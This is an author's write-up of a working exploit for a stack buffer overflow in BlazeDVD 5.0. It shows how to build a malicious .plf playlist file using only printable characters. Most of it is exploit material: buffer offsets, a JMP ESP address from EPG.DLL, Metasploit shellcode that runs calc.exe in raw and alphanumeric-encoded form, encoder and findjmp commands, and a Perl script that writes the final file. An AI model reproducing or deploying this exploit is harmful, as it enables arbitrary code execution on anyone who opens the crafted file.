Here is an exploit I wrote recently just for the fun of it. The goal was to write an exploit using only printable characters. I found this vulnerability a number of years ago and wrote an exploit at the time only having to worry about a few bad characters in the shellcode.
The ASCII character set consists of 128 characters of which 33 are non-printing control characters and 96 are printable characters. The extended ASCII character set consists of another 128 characters. So out of our 96 printable characters 94 of them are visibly printable starting from hex 0×21 to 0×7E. Below are all the printable characters we can use in our exploit.
Now in our vulnerability the offsets are shown below:
[BUFFER x 260 bytes] + [JMP] + [16 bytes junk] + [SHELLCODE in ESP]
Finding a jump address to ESP will land right at the beginning of our shellcode so no alignment is necessary which is great. The shellcode below encoding with “call4_dword_xor” minus the bad characters “\x00\x0a\x1a” worked for me generated from the Metasploit Framework.
# msfpayload windows/exec CMD=calc.exe exitfunc=process R # | msfencode -b '\x00\x0a\x1a' -e x86/call4_dword_xor -t perl # size 224 bytes
my $shellcode = "\x29\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" . "\x0e\x8d\x05\x7d\xe9\x83\xee\xfc\xe2\xf4\x71\xed\xf4\xe9" . "\x8d\x05\x1d\x60\x68\x34\xaf\x8d\x06\x57\x4d\x62\xdf\x09" . "\xf6\xbb\x99\x8e\x0f\xc1\x82\xb2\x37\xcf\xbc\xfa\x4c\x29" . "\x21\x39\x1c\x95\x8f\x29\x5d\x28\x42\x08\x7c\x2e\x6f\xf5" . "\x2f\xbe\x06\x57\x6d\x62\xcf\x39\x7c\x39\x06\x45\x05\x6c" . "\x4d\x71\x37\xe8\x5d\x55\xf6\xa1\x95\x8e\x25\xc9\x8c\xd6" . "\x9e\xd5\xc4\x8e\x49\x62\x8c\xd3\x4c\x16\xbc\xc5\xd1\x28" . "\x42\x08\x7c\x2e\xb5\xe5\x08\x1d\x8e\x78\x85\xd2\xf0\x21" . "\x08\x0b\xd5\x8e\x25\xcd\x8c\xd6\x1b\x62\x81\x4e\xf6\xb1" . "\x91\x04\xae\x62\x89\x8e\x7c\x39\x04\x41\x59\xcd\xd6\x5e" . "\x1c\xb0\xd7\x54\x82\x09\xd5\x5a\x27\x62\x9f\xee\xfb\xb4" . "\xe7\x04\xf0\x6c\x34\x05\x7d\xe9\xdd\x6d\x4c\x62\xe2\x82" . "\x82\x3c\x36\xf5\xc8\x4b\xdb\x6d\xdb\x7c\x30\x98\x82\x3c" . "\xb1\x03\x01\xe3\x0d\xfe\x9d\x9c\x88\xbe\x3a\xfa\xff\x6a" . "\x17\xe9\xde\xfa\xa8\x8a\xec\x69\x1e\xc7\xe8\x7d\x18\xe9";
What we need to do is now is write is shellcode to file. The perl script below will do this for us.
my $shellfile = "shellcalc.bin"; my $shellcode = "place shellcode here"; open(FILE,">$shellfile"); print FILE $shellcode; close(FILE); print length($shellcode) . " bytes written to file " . $shellfile . "\n";
Once written to file we will need to convert this to printable ascii code and Skylined “Alpha2″ or Alpha3″ encoder tool does just that for us. We will need to set a base register and since the shellcode is already aligned to ESP we’ll use ESP.
Command line shown below if using Alpha2 or Alpha3. The output will be printed on screen which we can copy and paste in our exploit.
>alpha2.exe esp < shellcalc.bin >alpha3.py esp --input="shellcalc.bin" --verbose
The final challenge would be to find a jump address that is in printable ascii. Luckily one of the BlazeDVD’s loaded libraries EPG.DLL (version 126.96.36.1996) contained a few jump addresses of which one worked perfectly and also making our exploit universal to this version of BlazeDVD. I just used the findjmp2.exe tool to obtain the address.
>findjmp2 EPG.dll esp 0x61626232 push esp - ret
Finally putting it all together we end up with our exploit
my $file = "blazedvdexp.plf"; my $buffer = "\x41" x 260; my $junk = "\x42" x 16; my $eip = pack('V',0x61626232);
# alpha2.exe esp < shellcalc.bin
my $shellcode = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABu". "JItkkymSJI8NkXyoKOKOKOo0aNOqqfDNIQLFSo9wMSXnIlYrZT". "gMRN8VKWo1mVwOPnetoGLMK3QZkdrOBLNsOzKdNUXUvmdmJo8N". "P1DUIQzPt92NGWpmlzWNokySnJ1oUvdNNkCnQ013sFVmH0PJN4". "pO2Lk3OJSnEgQZkvVGSREQXrfuKVTQXVjtnON9DMtGO7iPv5ml". "yKNh6mPkRLKppPbN6xzPCvJStfDNnkcnepL9RFTjb3O2KKoWIL". "oLMruzUUMIFmFgO3kpqEWIrLxMhMKdoOyMowLLbLiUDMaN7GQX". "KrqkksMJYMwNONmKkgI0VgOiKiTErLJs0myILzLkOwJrsRPxk6". "3okWnqzNbNRLLneQMpp2PzpvYzPElWxnl9BRSLUKMpP2YmK0us". "JM1QsMOONrO4Em4XZTlsm9vUM7obSIMZlDMpKZGLkyNDYnvZkW". "A";
open($FILE,">$file"); print $FILE $buffer . $eip . $junk . $shellcode; close($FILE); print "plf File Created successfully\n";
This exploit has been tested on BlazeDVD 5.0 so if using other versions the offsets might be different and the jump address also may not work.